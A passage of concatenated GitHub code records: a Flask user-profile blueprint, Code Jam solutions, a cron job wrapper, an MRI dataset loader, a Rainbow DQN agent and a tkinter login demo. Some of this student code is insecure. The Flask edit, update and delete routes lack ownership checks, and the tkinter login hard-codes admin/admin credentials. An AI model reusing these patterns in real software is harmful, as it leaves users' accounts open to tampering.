list[0:i])\n del list[0:i+1]\n R_tbl[r]=r\n list.insert(0,r)\n elif c == ']':\n i = list.index('[')\n r = 1/sum(1/R_tbl[x] for x in list[0:i])\n del list[0:i+1]\n R_tbl[r]=r\n list.insert(0,r)\n else:\n list.insert(0,c)\n\nprint(\"%.1f\" % list[0])\n","repo_name":"AnnickWONG/CodinGame","sub_path":"EASY/Equivalent Resistance, Circuit Building/Equivalent_Resistance.py","file_name":"Equivalent_Resistance.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39220400650","text":"# Implement all CRUD elements\n# Reference this: https://github.com/jacobtie/itsc-3155-module-10-demo/blob/main/blueprints/book_blueprint.py\nfrom flask import Blueprint, abort, redirect, render_template, request, session\nfrom models import Comment, Follower, Post, Userprofile, db\n\nrouter = Blueprint('user_profile_router', __name__, url_prefix='/user_profile')\n\n# Hirdhay\n@router.get('')\ndef get_all_user_profile():\n # if the user is not logged in it aborts to 401\n if not 'user' in session:\n abort(401)\n\n all_users = Userprofile.query.all()\n return render_template('all_users.html', users = all_users, user_in_session = session['user']['user_id'])\n\n# Haley\n@router.get('/')\ndef get_single_user_profile(user_id):\n # if the user is not logged in it aborts to 401\n if not 'user' in session:\n abort(401)\n followercount = Follower.query.filter_by(following_id=user_id).count()\n single_user_profile = Userprofile.query.get_or_404(user_id)\n \n isFollowing = False\n x = Follower.query.filter_by(follower_id=session['user']['user_id'], following_id=user_id).first()\n if x is not None:\n isFollowing = True\n \n postnum = Post.query.filter_by(user_id=user_id).count()\n followingcount = Follower.query.filter_by(follower_id=user_id).count()\n\n return render_template('single_user_profile.html', user = single_user_profile, user_in_session = session['user']['user_id'], followercount = followercount, postnum = postnum, followingcount = followingcount, isFollowing = isFollowing)\n\n# Hirdhay\n@router.get('//edit')\ndef get_edit_user_profile_form(user_id):\n user_to_edit = Userprofile.query.get_or_404(user_id)\n return render_template('editprofile.html', user = user_to_edit, user_in_session = session['user']['user_id'])\n\n# Hirdhay\n@router.post('/')\ndef update_user_profile(user_id):\n user_to_update = Userprofile.query.get_or_404(user_id)\n name = request.form.get('name', '')\n location = request.form.get('location', '')\n biography = request.form.get('biography', '')\n\n if location == '' or biography == '':\n abort(400)\n\n\n user_to_update.user_location = location\n user_to_update.user_biography = biography\n\n db.session.commit()\n\n #return redirect(f'/user_profile/{user_id}', user_in_session = session['user']['user_id'])\n return redirect(f'/user_profile/{user_id}')\n \n# Hirdhay\n@router.post('//delete')\ndef delete_user_profile(user_id):\n print(\"here\" + user_id)\n user_to_endit = Userprofile.query.get_or_404(user_id)\n\n #must delete all posts made by user and all comments related to post made by said user\n posts_to_delete = Post.query.filter_by(user_id=user_to_endit.user_id).all() \n for post in posts_to_delete: #you have to delete all comments related to that post before deleting the post\n comments_to_delete = Comment.query.filter_by(post_id=post.post_id).all()\n for comment in comments_to_delete: #you have to delete all comments related to that post before deleting the post\n db.session.delete(comment)\n db.session.delete(post)\n \n comments_by_user = Comment.query.filter_by(user_id=user_to_endit.user_id).all()\n\n #have to delete all comments made by said user\n for comment in comments_by_user:\n db.session.delete(comment)\n\n follow1 = Follower.query.filter_by(follower_id=user_to_endit.user_id).all()\n follow2 = Follower.query.filter_by(following_id=user_to_endit.user_id).all()\n #delete from follower-follower\n for follow in follow1:\n db.session.delete(follow)\n for follow in follow2:\n db.session.delete(follow)\n\n #sign user out\n if 'user' not in session:\n abort(401)\n\n # delete the user session\n del session['user']\n #finally delete user\n db.session.delete(user_to_endit)\n db.session.commit()\n return redirect('/')\n\n@router.post('//follow')\ndef follow_user(user_id):\n follower_id = session['user']['user_id']\n following_id = user_id\n\n already = Follower.query.filter_by(follower_id=follower_id, following_id=following_id).first()\n print(already)\n\n\n if already is not None:\n db.session.delete(already)\n else:\n new = Follower(follower_id=follower_id, following_id=following_id)\n db.session.add(new)\n\n db.session.commit()\n\n\n return redirect(f'/user_profile/{user_id}')\n\n","repo_name":"thompaw/3155Project","sub_path":"blueprints/user_profile_blueprint.py","file_name":"user_profile_blueprint.py","file_ext":"py","file_size_in_byte":4389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23454391411","text":"#!python\r\n#shyness.py\r\nimport sys\r\n\r\ndef main(argv):\r\n file = open(\"A-large.in\", 'r')\r\n out = open(\"ouputshyness.txt\", 'w')\r\n \r\n cases = int(file.readline())\r\n on_case = 1\r\n \r\n for line in file:\r\n case = line.split(' ')\r\n max = int(case[0])\r\n standing = 0\r\n friends = 0\r\n for i in range(0, max + 1):\r\n if standing < i:\r\n friends += i - standing\r\n standing = i\r\n standing += int(case[1][i])\r\n \r\n out.write('Case #' + str(on_case) + ': ' + str(friends) + '\\n')\r\n on_case += 1\r\n\r\nif __name__ == \"__main__\":\r\n main(sys.argv)","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/3221.py","file_name":"3221.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19029559304","text":"\"\"\"\nGiven a list of words like so:\nwords = [\n 'look', 'into', 'my', 'eyes', 'look', 'into', 'my', 'eyes',\n 'the', 'eyes', 'the', 'eyes', 'the', 'eyes', 'not', 'around', 'the',\n 'eyes', \"don't\", 'look', 'around', 'the', 'eyes', 'look', 'into',\n 'my', 'eyes', \"you're\", 'under'\n]\nWrite a python snippet to find the words that occur most often. You output should look something like the following:\n[('eyes', 8), ('the', 5), ('look', 4)]\n\"\"\"\n\nimport operator\n\nclass WordCounter(object):\n\n def __init__(self, wordList):\n self.workList = sorted(wordList)\n self.wordLister()\n\n def wordLister(self):\n self.counted = {}\n for word in self.workList:\n if not word in self.counted:\n self.counted[word] = 0\n self.counted[word] += 1 \n self.summaryList = sorted(self.counted.items(), key = operator.itemgetter[1], reverse = True)\n\n print(self.summaryList)\n\nwords = [\n 'look', 'into', 'my', 'eyes', 'look', 'into', 'my', 'eyes',\n 'the', 'eyes', 'the', 'eyes', 'the', 'eyes', 'not', 'around', 'the',\n 'eyes', \"don't\", 'look', 'around', 'the', 'eyes', 'look', 'into',\n 'my', 'eyes', \"you're\", 'under'\n]\n\nrezo = WordCounter(words)\n\n","repo_name":"shoe61/2143-OOP-Schumacher","sub_path":"scraps/underDog.py","file_name":"underDog.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23569854281","text":"from math import ceil\n\ndef solve(a, b, mans):\n if mans == 1:\n return (int((b-a)/2) + (b-a)%2 - 1, int((b-a)/2 - 1))\n else:\n if (b-a)%2:\n t = mans%2\n t = 0 if t == 1 else 1\n return solve(a, int(b/2) + t, int(mans/2))\n else:\n return solve(a, int(b/2) + 1, int(mans/2))\n\n\nt = int(input())\n\nfor i in range(1, t + 1):\n n, k = [int(s) for s in input().split(\" \")]\n\n l = solve(1, n+2, k)\n print (\"Case #{0}: {1} {2}\".format(i, l[0], l[1]))\n\n\n\n \n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/2278.py","file_name":"2278.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25447877658","text":"from PIL import Image\n\nASCII_CHARS = \"MNHQ$OC?7>!:-;. \"\nNUM_ASCII_CHARS = len(ASCII_CHARS)\n\n\ndef render_frame(frame, width, height):\n scaled_image = frame.resize((width, height), Image.BILINEAR)\n pixels = scaled_image.load()\n\n string = \"\"\n for row in range(height):\n for col in range(width):\n pixel = pixels[col, row] # RGB\n rgb = pixel[:3]\n avg_rgb = sum(rgb) / 3.0\n string += ASCII_CHARS[int(avg_rgb / 256.0 * NUM_ASCII_CHARS)]\n\n string += \"\\n\"\n return string\n\n\ndef render_ascii_art(image, width, height):\n while True:\n try:\n yield render_frame(image.convert(\"RGB\"), width, height)\n image.seek(image.tell() + 1)\n except EOFError:\n break\n\n\ndef get_image_duration(image):\n return image.info.get(\"duration\", 1000)\n\n","repo_name":"kabisa/falcon_ascii_renderer","sub_path":"app/ascii/renderer.py","file_name":"renderer.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40097354034","text":"import torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset\nfrom torchvision import datasets\nimport numpy as np\n\nimport os\nfrom glob import glob\n\nimport gdown\nimport nibabel as nib\nfrom zipfile import ZipFile\nfrom tqdm import tqdm\nfrom skimage.transform import resize\n\n\n\nclass Brats2020Dataset2020(Dataset):\n\n URL = 'https://drive.google.com/uc?id=1fjhJKi6Cs71MpbTa_u4oHHKF3rO41F97&export=download'\n OUT_FILE = 'micca_train_2.zip'\n UNZIP_FOLDER = 'dataset/miccai_train'\n\n def __init__(self, root, train=True, transform=None, download=False, resize_=True, normalize_ = True):\n self.root = os.path.expanduser(root)\n self.transform = transform\n self.train = train # training set or test set\n self.UNZIP_FOLDER = os.path.join(self.root, self.UNZIP_FOLDER)\n self.resize_ = resize_\n self.normalize_ = normalize_\n # Creating necessary Directories\n self.make_dirs()\n\n if download and not self._check_exists():\n self.download()\n self.extract()\n self.arrange()\n\n if not self._check_exists():\n raise RuntimeError('Dataset not found.' +\n ' You can use download=True to download it')\n\n self.folder_prefix = \"BraTS20_Training\"\n self.all_files = glob(os.path.join(\n self.UNZIP_FOLDER) + \"/{instance_folder}*/{instance_folder}*.gz\".format(instance_folder=self.folder_prefix))\n self.images_t1c = np.array(\n sorted([file for file in self.all_files if file.endswith('t1ce.nii.gz')]))\n self.images_seg = np.array(\n sorted([file for file in self.all_files if file.endswith('seg.nii.gz')]))\n # np.random.seed(42)\n self.perm = np.random.permutation(len(self.images_t1c))\n self.split = int(0.8 * len(self.perm))\n\n if self.train:\n self.images_t1c = self.images_t1c[self.perm[:self.split]]\n self.images_seg = self.images_seg[self.perm[:self.split]]\n else:\n self.images_t1c = self.images_t1c[self.perm[self.split:]]\n self.images_seg = self.images_seg[self.perm[self.split:]]\n\n def _check_exists(self):\n return os.path.exists(self.UNZIP_FOLDER)\n\n def make_dirs(self):\n dirslist = [self.UNZIP_FOLDER]\n for dir_ in dirslist:\n if not os.path.exists(dir_):\n os.mkdir\n\n def download(self):\n print(\"Dwonload Started !!!\")\n gdown.download(self.URL, output=None, quiet=False)\n print(\"Dwonload Finished !!!\")\n\n def extract(self):\n print(\"Unzipping the File\")\n with ZipFile(file=os.path.join(self.root, self.OUT_FILE)) as zip_file:\n for file in tqdm(iterable=zip_file.namelist(), total=len(zip_file.namelist())):\n zip_file.extract(\n member=file, path=os.path.join(self.root, 'dataset'))\n print(\"Done\")\n\n def arrange(self):\n # Removing the Zipped File\n print(\"Removing the Zipped File\")\n self.zipfile_ = os.path.join(self.root, self.OUT_FILE)\n if os.path.exists(self.zipfile_):\n os.remove(self.zipfile_)\n print(\"Removing the unwated files\")\n\n self.folder_prefix = \"BraTS20_Training\"\n self.all_files = glob(os.path.join(\n self.UNZIP_FOLDER) + \"/{instance_folder}*/{instance_folder}*.gz\".format(instance_folder=self.folder_prefix))\n for i in self.all_files:\n if not i.endswith('t1ce.nii.gz') and not i.endswith('seg.nii.gz'):\n os.remove(i)\n\n def resize(self, data: np.ndarray):\n data = resize(data, (80, 120, 120), preserve_range=True)\n return data\n\n def normalize(self, data: np.ndarray):\n data_min = np.min(data)\n return (data - data_min) / (np.max(data) - data_min)\n\n def __len__(self):\n return len(self.images_t1c)\n\n def __getitem__(self, index):\n\n img, target = nib.load(self.images_t1c[index]), nib.load(self.images_seg[index])\n \n img, target = img.get_fdata(), target.get_fdata()\n\n target = ((target == 1) | (target == 4)).astype('float32')\n\n # target = np.clip(target.astype(np.uint8), 0, 1).astype(np.float32)\n # target = np.clip(target, 0, 1)\n\n if self.normalize_:\n img = self.normalize(img)\n\n if self.transform:\n img = self.transform(img)\n target = self.transform(target)\n\n if self.resize_:\n img = self.resize(img)\n target = self.resize(target)\n\n \n # Creating channels as single channels \n img = torch.FloatTensor(img).unsqueeze(0)\n target = torch.FloatTensor(target).unsqueeze(0)\n return img, target\n \n","repo_name":"rohitkuk/Brain_Tumour_Segmentation_3D_MRI","sub_path":"src/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4740,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"20829440997","text":"def reverse_string(str1): \r\n rev_str = \"\"\r\n for i in range(len(str1)-1,-1,-1):\r\n rev_str+=a[i]\r\n return rev_str\r\n\r\nprint(\"***** REVERSE A STRING *****\")\r\nch = 'y'\r\nwhile(ch=='y' or ch=='Y'):\r\n a = input(\"\\nEnter a String: \")\r\n print(\"Reverse of \", a,\" is: \", reverse_string(a))\r\n\r\n ch = input(\"\\nWant to continue?(y/n): \")\r\ninput()\r\n","repo_name":"BhoomikaSingh20/Python","sub_path":"curves_using_matplotlib_numpy.py","file_name":"curves_using_matplotlib_numpy.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3615851167","text":"class Search(object):\n \"\"\"description of class\"\"\"\n @staticmethod\n def BS(list, key):\n low = 0\n high = len(list) - 1\n while (low <= high):\n mid = int((low + high) / 2)\n guess = list[mid]\n if (guess == key):\n return mid\n if (guess < key):\n low = mid + 1\n else:\n high = mid - 1\n return None","repo_name":"Mohamed-Gnana/Grokking-Algorithms","sub_path":"ChapterOne/BinarySearchPython/BinarySearchPython/Common.py","file_name":"Common.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22022388613","text":"#!/usr/bin/env python3\n\n\"\"\"Wrapper that adds exclusive locks, timeouts, timestamp accounting,\nmax frequency, logging, etc... to running cron jobs.\n\"\"\"\n\nimport datetime\nimport logging\nimport os\nimport sys\nfrom typing import Optional\n\nfrom pyutils import bootstrap, config, exec_utils, stopwatch\nfrom pyutils.datetimes import datetime_utils\nfrom pyutils.exceptions import PyUtilsLockfileException\nfrom pyutils.files import file_utils, lockfile\n\nlogger = logging.getLogger(__name__)\n\ncfg = config.add_commandline_args(\n f\"Python Cron Runner ({__file__})\",\n \"Wrapper for cron commands with locking, timeouts, and accounting.\",\n)\ncfg.add_argument(\n \"--lockfile\",\n default=None,\n metavar=\"LOCKFILE_PATH\",\n help=\"Path to the lockfile to use to ensure that two instances of a command do not execute contemporaneously.\",\n)\ncfg.add_argument(\n \"--lockfile_audit_record\",\n default=None,\n metavar=\"LOCKFILE_AUDIT_RECORD_FILENAME\",\n help=\"Path to a record of when the logfile was held/released and for what reason\",\n)\ncfg.add_argument(\n \"--timeout\",\n type=str,\n metavar=\"TIMEOUT\",\n default=None,\n help='Maximum time for lock acquisition + command execution. Undecorated for seconds but \"3m\" or \"1h 15m\" work too.',\n)\ncfg.add_argument(\n \"--timestamp\",\n type=str,\n metavar=\"TIMESTAMP_FILE\",\n default=None,\n help=\"The /timestamp/TIMESTAMP_FILE file tracking the work being done; files' mtimes will be set to the last successful run of a command for accounting purposes.\",\n)\ncfg.add_argument(\n \"--max_frequency\",\n type=str,\n metavar=\"FREQUENCY\",\n default=None,\n help='The maximum frequency with which to do this work; even if the wrapper is invoked more often than this it will not run the command. Requires --timestamp. Undecorated for seconds but \"3h\" or \"1h 15m\" work too.',\n)\ncfg.add_argument(\n \"--command\",\n nargs=\"*\",\n required=True,\n type=str,\n metavar=\"COMMANDLINE\",\n help=\"The commandline to run under a lock.\",\n)\nconfig.overwrite_argparse_epilog(\n \"\"\"\ncron.py's exit value:\n\n -1000 = some internal error occurred (see exception log).\n 0 = we exited early due to not enough time passage since the last\n invocation of --command.\n 1000 = we could not obtain the lockfile; someone else owns it.\n else = if the --command was run successfully, cron.py will exit with\n the same code that the subcommand exited with.\n\"\"\"\n)\n\n\ndef run_command(timeout: Optional[int], timestamp_file: Optional[str]) -> int:\n \"\"\"Run cron command\"\"\"\n cmd = \" \".join(config.config[\"command\"])\n logger.info('cron cmd = \"%s\"', cmd)\n logger.debug(\"shell environment:\")\n for var in os.environ:\n val = os.environ[var]\n logger.debug(\"%s = %s\", var, val)\n logger.debug(\"____ (↓↓↓ output from the subprocess appears below here ↓↓↓) ____\")\n try:\n with stopwatch.Timer() as t:\n ret = exec_utils.cmd_exitcode(cmd, timeout)\n logger.debug(\n \"____ (↑↑↑ subprocess finished in %.2fss, exit value was %d ↑↑↑) ____\",\n t(),\n ret,\n )\n if ret == 0 and timestamp_file is not None and os.path.exists(timestamp_file):\n logger.debug(\"Touching %s\", timestamp_file)\n file_utils.touch_file(timestamp_file)\n return ret\n except Exception:\n msg = \"Cron subprocess failed; giving up.\"\n logger.exception(msg)\n print(\"Cron subprocess failed, giving up.\", file=sys.stderr)\n return -1000\n\n\n@bootstrap.initialize\ndef main() -> int:\n \"\"\"Entry point\"\"\"\n if config.config[\"timestamp\"]:\n timestamp_file = f\"/timestamps/{config.config['timestamp']}\"\n if not file_utils.does_file_exist(timestamp_file):\n logger.error(\n \"--timestamp argument's target file (%s) must already exist.\",\n timestamp_file,\n )\n sys.exit(-1)\n else:\n timestamp_file = None\n if config.config[\"max_frequency\"]:\n config.error(\n \"The --max_frequency argument requires the --timestamp argument.\"\n )\n\n now = datetime.datetime.now()\n if timestamp_file is not None and os.path.exists(timestamp_file):\n max_frequency = config.config[\"max_frequency\"]\n if max_frequency is not None:\n max_delta = datetime_utils.parse_duration(max_frequency)\n if max_delta > 0:\n mtime = file_utils.get_file_mtime_as_datetime(timestamp_file)\n delta = now - mtime\n if delta.total_seconds() < max_delta:\n logger.info(\n \"It's only been %s since we last ran successfully; bailing out.\",\n datetime_utils.describe_duration_briefly(delta.total_seconds()),\n )\n sys.exit(0)\n\n timeout = config.config[\"timeout\"]\n if timeout is not None:\n timeout = datetime_utils.parse_duration(timeout)\n assert timeout > 0\n logger.debug(\"Timeout is %ss\", timeout)\n lockfile_expiration = datetime.datetime.now().timestamp() + timeout\n else:\n logger.warning(\"Timeout not specified; no lockfile expiration.\")\n lockfile_expiration = None\n\n lockfile_path = config.config[\"lockfile\"]\n if lockfile_path is not None:\n logger.debug(\"Attempting to acquire lockfile %s...\", lockfile_path)\n try:\n with lockfile.LockFile(\n lockfile_path,\n do_signal_cleanup=True,\n override_command=\" \".join(config.config[\"command\"]),\n expiration_timestamp=lockfile_expiration,\n ) as lf:\n record = config.config[\"lockfile_audit_record\"]\n cmd = \" \".join(config.config[\"command\"])\n if record:\n start = lf.locktime\n with open(record, \"a\") as wf:\n print(f\"{lockfile_path}, ACQUIRE, {start}, {cmd}\", file=wf)\n retval = run_command(timeout, timestamp_file)\n if record:\n end = datetime.datetime.now().timestamp()\n duration = datetime_utils.describe_duration_briefly(end - start)\n with open(record, \"a\") as wf:\n print(\n f\"{lockfile_path}, RELEASE({duration}), {end}, {cmd}\",\n file=wf,\n )\n return retval\n except PyUtilsLockfileException:\n msg = f\"Failed to acquire {lockfile_path}, giving up.\"\n logger.exception(msg)\n print(msg, file=sys.stderr)\n return 1000\n else:\n logger.debug(\"No lockfile indicated; not locking anything.\")\n return run_command(timeout, timestamp_file)\n\n\nif __name__ == \"__main__\":\n # Insist that our logger.whatever('messages') make their way into\n # syslog with a facility=LOG_CRON, please. Yes, this is hacky.\n sys.argv.append(\"--logging_syslog\")\n sys.argv.append(\"--logging_syslog_facility=CRON\")\n main()\n","repo_name":"scottgasch/pyutils","sub_path":"examples/cron/cron.py","file_name":"cron.py","file_ext":"py","file_size_in_byte":7115,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"17822470101","text":"import math, random\nfrom simulation import *\n#import gym\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.autograd as autograd \nimport torch.nn.functional as F\n\nfrom common.layers import NoisyLinear\nfrom common.replay_buffer import ReplayBuffer\nfrom gen_dataset import *\nUSE_CUDA = torch.cuda.is_available()\nVariable = lambda *args, **kwargs: autograd.Variable(*args, **kwargs).cuda() if USE_CUDA else autograd.Variable(*args, **kwargs)\n\n\nclass RainbowDQN(nn.Module):\n def __init__(self, num_inputs, num_actions, num_atoms, Vmin, Vmax):\n super(RainbowDQN, self).__init__()\n \n self.num_inputs = num_inputs\n self.num_actions = num_actions\n self.num_atoms = num_atoms\n self.Vmin = Vmin\n self.Vmax = Vmax\n # Markovian\n numNodes = 16\n # NonMarkovian\n # numNodes = 48\n\n self.linear1 = nn.Linear(num_inputs, numNodes)\n self.linear2 = nn.Linear(numNodes, numNodes)\n \n # numNodes = 16\n\n self.noisy_value1 = NoisyLinear(numNodes, numNodes, use_cuda=USE_CUDA)\n self.noisy_value2 = NoisyLinear(numNodes, self.num_atoms, use_cuda=USE_CUDA)\n \n self.noisy_advantage1 = NoisyLinear(numNodes, numNodes, use_cuda=USE_CUDA)\n self.noisy_advantage2 = NoisyLinear(numNodes, self.num_atoms * self.num_actions, use_cuda=USE_CUDA)\n \n def forward(self, x):\n batch_size = x.size(0)\n \n x = F.relu(self.linear1(x))\n x = F.relu(self.linear2(x))\n \n value = F.relu(self.noisy_value1(x))\n value = self.noisy_value2(value)\n \n advantage = F.relu(self.noisy_advantage1(x))\n advantage = self.noisy_advantage2(advantage)\n \n value = value.view(batch_size, 1, self.num_atoms)\n advantage = advantage.view(batch_size, self.num_actions, self.num_atoms)\n \n x = value + advantage - advantage.mean(1, keepdim=True)\n x = F.softmax(x.view(-1, self.num_atoms)).view(-1, self.num_actions, self.num_atoms)\n \n return x\n \n def reset_noise(self):\n self.noisy_value1.reset_noise()\n self.noisy_value2.reset_noise()\n self.noisy_advantage1.reset_noise()\n self.noisy_advantage2.reset_noise()\n \n def act(self, state):\n state = Variable(torch.FloatTensor(state).unsqueeze(0), volatile=True)\n dist = self.forward(state).data.cpu()\n dist = dist * torch.linspace(self.Vmin, self.Vmax, self.num_atoms)\n action = dist.sum(2).max(1)[1].numpy()[0]\n return action\n\n\n\ndef update_target(current_model, target_model):\n target_model.load_state_dict(current_model.state_dict())\n\ndef projection_distribution(next_state, rewards, dones,Vmax,Vmin,num_atoms,target_model,batch_size):\n batch_size = next_state.size(0)\n \n delta_z = float(Vmax - Vmin) / (num_atoms - 1)\n support = torch.linspace(Vmin, Vmax, num_atoms)\n \n next_dist = target_model(next_state).data.cpu() * support\n next_action = next_dist.sum(2).max(1)[1]\n next_action = next_action.unsqueeze(1).unsqueeze(1).expand(next_dist.size(0), 1, next_dist.size(2))\n next_dist = next_dist.gather(1, next_action).squeeze(1)\n \n rewards = rewards.unsqueeze(1).expand_as(next_dist)\n dones = dones.unsqueeze(1).expand_as(next_dist)\n support = support.unsqueeze(0).expand_as(next_dist)\n \n Tz = rewards + (1 - dones) * 0.99 * support\n Tz = Tz.clamp(min=Vmin, max=Vmax)\n b = (Tz - Vmin) / delta_z\n l = b.floor().long()\n u = b.ceil().long()\n \n offset = torch.linspace(0, (batch_size - 1) * num_atoms, batch_size).long()\\\n .unsqueeze(1).expand(batch_size, num_atoms)\n\n proj_dist = torch.zeros(next_dist.size()) \n proj_dist.view(-1).index_add_(0, (l + offset).view(-1), (next_dist * (u.float() - b)).view(-1))\n proj_dist.view(-1).index_add_(0, (u + offset).view(-1), (next_dist * (b - l.float())).view(-1))\n \n return proj_dist\n\ndef compute_td_loss(batch_size,replay_buffer,Vmax,Vmin,num_atoms,current_model,target_model,optimizer):\n state, action, reward, next_state, done = replay_buffer.sample(batch_size) \n #print('Vmax = ',Vmax)\n \n state = Variable(torch.FloatTensor(np.float32(state)))\n next_state = Variable(torch.FloatTensor(np.float32(next_state)), volatile=True)\n action = Variable(torch.LongTensor(action))\n reward = torch.FloatTensor(reward)\n done = torch.FloatTensor(np.float32(done))\n #print(state)\n proj_dist = projection_distribution(next_state, reward, done,Vmax,Vmin,num_atoms,target_model,batch_size)\n \n dist = current_model(state)\n action = action.unsqueeze(1).unsqueeze(1).expand(batch_size, 1, num_atoms)\n dist = dist.gather(1, action).squeeze(1)\n dist.data.clamp_(0.01, 0.99)\n loss = -(Variable(proj_dist) * dist.log()).sum(1)\n loss = loss.mean()\n #print(loss) \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n current_model.reset_noise()\n target_model.reset_noise()\n \n return loss\n\nif __name__ == \"__main__\":\n path = './model/modelps1.pt'\n ps = 1\n n = 10\n dict1 = gen_data(n)\n\n num_input = 3\n \n action_dict = dict()\n actions = [32,48,64,80,96,112,128]\n for i in range(len(actions)):\n action_dict[i]=actions[i]\n\n other_action_dict = dict()\n other_action_dict[0] = 32\n other_action_dict[1] = 128\n\n num_states = 3\n num_action = len(actions)\n eplen = 20\n\n env = commEnv(ps,dict1,action_dict,other_action_dict,eplen)\n \n\n # env = commEnv(ps,dict1,action_dict)\n\n\n num_atoms = 5\n Vmin = 16\n Vmax = 20\n\n current_model = RainbowDQN(num_input, num_action, num_atoms, Vmin, Vmax)\n target_model = RainbowDQN(num_input, num_action, num_atoms, Vmin, Vmax)\n\n if USE_CUDA:\n current_model = current_model.cuda()\n target_model = target_model.cuda()\n \n optimizer = optim.Adam(current_model.parameters(), 0.0001)\n\n replay_buffer = ReplayBuffer(10000)\n\n update_target(current_model, target_model)\n\n num_frames = 10000\n batch_size = 32\n gamma = 1\n\n losses = []\n all_rewards = []\n episode_reward = 0\n\n state = env.reset()\n # print(state)\n for frame_idx in range(1, num_frames + 1):\n action = current_model.act(state)\n # print('action = ',action) \n next_state, reward, done, _= env.step(action)\n replay_buffer.push(state, action, reward, next_state, done)\n \n #print(reward)\n state = next_state\n #print(cw_min)\n episode_reward += reward\n if episode_reward > 195:\n break \n if done:\n print('Frame = ',frame_idx,'Reward = ',episode_reward)\n state= env.reset()\n all_rewards.append(episode_reward)\n episode_reward = 0\n \n if len(replay_buffer) > batch_size:\n #print('======================================= Start Training =========================================')\n loss = compute_td_loss(batch_size,replay_buffer,Vmax,Vmin,num_atoms,current_model,target_model,optimizer)\n #print(loss)\n losses.append(loss.data)\n #if frame_idx % 200 == 0:\n # plot(frame_idx, all_rewards, losses)\n \n if frame_idx % 500 == 0:\n update_target(current_model, target_model)\n #print(all_rewards)\n torch.save(current_model.state_dict(),path)","repo_name":"kumarabhish3k/Rainbow-DQN-for-Contention-Window-design","sub_path":"rainbow.py","file_name":"rainbow.py","file_ext":"py","file_size_in_byte":7505,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"11679007807","text":"'''\n\tPython learning \n\tday1.py\n'''\nfrom tkinter import *\nfrom tkinter.ttk import *\n########################################################################\n'''\nevent\n'''\n# def display(event):\n# \tglobal root\n# \tw2=Label(root,text=\"Hello,World!\")\n# \tw2.pack()\n\n\n# root =Tk()\n# b1=Button(root,text=\"请点击!\")\n# b1['width']=20\n# b1['height']=4\n# # b1['background']='red'\n# b1.bind(\"\",display)\n# b1.pack()\n\n# root.mainloop()\n########################################################################\n'''\npack()\n'''\n# root =Tk()\n# Button(root,text='A').pack(side=LEFT,expand=YES,fill=Y)\n# Button(root,text='B').pack(side=TOP,expand=NO,fill=BOTH)\n# Button(root,text='C').pack(side=RIGHT,expand=YES,fill=NONE,anchor=NE)\n# Button(root,text='D').pack(side=LEFT,expand=NO,fill=Y,anchor=NW)\n# Button(root,text='E').pack(side=TOP,expand=NO,fill=NONE,anchor=NW)\n# Button(root,text='F').pack(side=BOTTOM,expand=NO,fill=NONE,anchor=NW)\n# Button(root,text='G').pack(anchor=SE)\n# root.mainloop()\n########################################################################\n'''\ngrid() password LoginBox()\n'''\nroot=Tk()\ne=StringVar()\nu=StringVar()\n\ndef cls1(event):\n\tglobal e\n\te.set(\"\")\n\n\ndef cls2(event):\n\tglobal u\n\tu.set(\"\")\n\n\nLabel(root,text=\"账号:\").grid(row=0,sticky=W)\nentry1=Entry(root,textvariable=e)\ne.set(\"input your name here\")\nentry1.bind('',cls1)\n# entry1.selection_clear()\nentry1.grid(row=0,column=1,sticky=E)\n\n\n\nLabel(root,text=\"密码:\").grid(row=1,sticky=W)\nentry2=Entry(root,textvariable=u,show='*')\nentry2.bind('',cls2)\nentry2.grid(row=1,column=1,sticky=E)\ndef callback():\n\tt1 = entry1.get()\n\tt2 = entry2.get()\n\tt3=StringVar()\n\tif (t1 == \"admin\") & (t2 == \"admin\"):\n\t\tt3.set(\"登录成功\")\n\telse:\n\t\tt3.set(\"登录失败\")\n\t\tentry1.delete(0,len(t1))\n\t\tentry2.delete(0,len(t2))\n\tLabel(root,textvariable=t3).grid(row=3,column=0,sticky=EW)\n\t\n\nButton(root,text=\"登录\",command=callback).grid(row=2,column=1,sticky=EW)\n\nroot.mainloop()\n\n'''\ne.delete()删除内容\n-- 删除参数 first 到 last 范围内(包含 first 和 last)的所有内容\n-- 如果忽略 last 参数,表示删除 first 参数指定的选项\n-- 使用 delete(0, END) 实现删除输入框的所有内容\n'''\n\n'''\n************tkinter 的布局 ****************\n1. 其实我们已经接触过 tkinter 的一种布局,就是 pack 布局,它非常简单,我们不用做过多的设置,直接使用一个pack 函数就可以了。\n2.grid 布局: grid 可以理解为网格,或者表格,它可以把界面设置为几行几列的网格,我们在网格里插入我们想要的元素。这种布局的好处\n是不管我们如何拖动窗口,相对位置是不会变化的,而且这种布局也超简单。\n3.place 